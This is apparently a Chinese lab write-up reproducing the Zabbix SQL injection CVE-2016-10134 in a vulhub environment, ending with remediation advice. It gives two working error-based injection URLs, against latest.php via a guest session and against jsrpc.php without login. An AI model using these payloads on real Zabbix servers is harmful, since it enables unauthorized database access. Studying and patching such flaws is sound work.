最近也是遇見了Zabbix，所以這裡以CVE-2016-10134為例復現一下該漏洞

什麼是Zabbix?

　　zabbix是一個基於WEB介面的提供分散式系統監視以及網路監視功能的企業級的開源解決方案。zabbix能監視各種網路引數，保證伺服器系統的安全運營；並提供靈活的通知機制以讓系統管理員快速定位/解決存在的各種問題。

zabbix由2部分構成，zabbix server與可選元件zabbix agent。zabbix server可以通過SNMP，zabbix agent，ping，埠監視等方法提供對遠端伺服器/網路狀態的監視，資料收集等功能，它可以執行在Linux，Solaris，HP-UX，AIX，Free BSD，Open BSD，OS X等平臺上。

漏洞復現

我們這裡是用vulhub這個靶場生成的Zabbix這個漏洞環境

大概的登入介面就是這樣子

有兩個頁面分別存在注入，我們來分開驗證一下

1. latest.php

（1）這個前提需要登入進去，比如未關閉Guest等。

攻擊機已知靶機ip，且靶機系統未關閉預設開啟guest賬戶登陸

訪問http://xx.xx.xx.xx:8080，用賬號guest（密碼為空）登入遊客賬戶

（2）這個需要把cookie中的zbx_sessionid後16值拿出來，當作下面payload中sid值，然後進行注入。（這裡的sid是登入介面的zbx_sessionid）

（3）payload：http://ip:port/latest.php?output=ajax&sid=d069aac010102217&favobj=toggle&toggle_open_state=1&toggle_ids[]=updatexml(0,concat(0xa,user()),0)

說明此頁面存在sql注入

2. jsrpc.php

漏洞產生原因：profileIdx2 引數沒有被過濾
利用條件：guest使用者開啟，允許訪問
影響版本：2.0.x| 2.2.x| 2.4.x| 3.0.0-3.0.3

通過這個無需登入

payload：http://ip:port/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)

漏洞修復：

1.禁用Guest賬戶，關閉無用賬戶。

2.打補丁，升級zabbix版本。